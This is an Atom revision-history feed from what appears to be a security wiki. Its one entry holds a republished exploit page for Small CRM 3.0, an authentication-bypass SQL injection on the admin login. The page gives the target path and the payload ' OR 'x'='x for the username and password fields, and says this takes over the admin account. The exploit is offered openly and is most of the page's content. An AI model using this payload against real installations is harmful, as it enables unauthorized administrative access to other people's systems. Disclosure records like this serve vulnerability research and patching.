<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Small_CRM_3.0_SQL%E7%9B%B2%E6%B3%A8%E6%BC%8F%E6%B4%9E</id>
	<title>Small CRM 3.0 SQL盲注漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Small_CRM_3.0_SQL%E7%9B%B2%E6%B3%A8%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Small_CRM_3.0_SQL%E7%9B%B2%E6%B3%A8%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T04:29:35Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Small_CRM_3.0_SQL%E7%9B%B2%E6%B3%A8%E6%BC%8F%E6%B4%9E&amp;diff=5053&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Small CRM 3.0 - 'Authentication Bypass' SQL Injection # Date: 12/06/2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.co...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Small_CRM_3.0_SQL%E7%9B%B2%E6%B3%A8%E6%BC%8F%E6%B4%9E&amp;diff=5053&amp;oldid=prev"/>
		<updated>2021-06-15T01:22:25Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Small CRM 3.0 - &amp;#039;Authentication Bypass&amp;#039; SQL Injection # Date: 12/06/2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.co...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Small CRM 3.0 - 'Authentication Bypass' SQL Injection&lt;br /&gt;
# Date: 12/06/2021&lt;br /&gt;
# Exploit Author: BHAVESH KAUL&lt;br /&gt;
# Vendor Homepage: https://phpgurukul.com&lt;br /&gt;
# Software Link: https://phpgurukul.com/small-crm-php/&lt;br /&gt;
# Version: 3.0&lt;br /&gt;
# Tested on: Server: XAMPP&lt;br /&gt;
&lt;br /&gt;
# Description #&lt;br /&gt;
&lt;br /&gt;
Small CRM 3.0 is vulnerable to SQL Injection on it's admin login because of insufficient user supplied data sanitization and the sql injection payload being executed. Attacker is able to access the admin login panel and supply the malicious payload, successfully taking over admin account.&lt;br /&gt;
&lt;br /&gt;
# Proof of Concept (PoC) : Exploit #&lt;br /&gt;
&lt;br /&gt;
1) Goto: http://localhost/crm/admin/&lt;br /&gt;
&lt;br /&gt;
2) Enter the following payload in 'Username' and 'Password' parameter: ' OR 'x'='x&lt;br /&gt;
&lt;br /&gt;
3) SQL Injection successfull&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>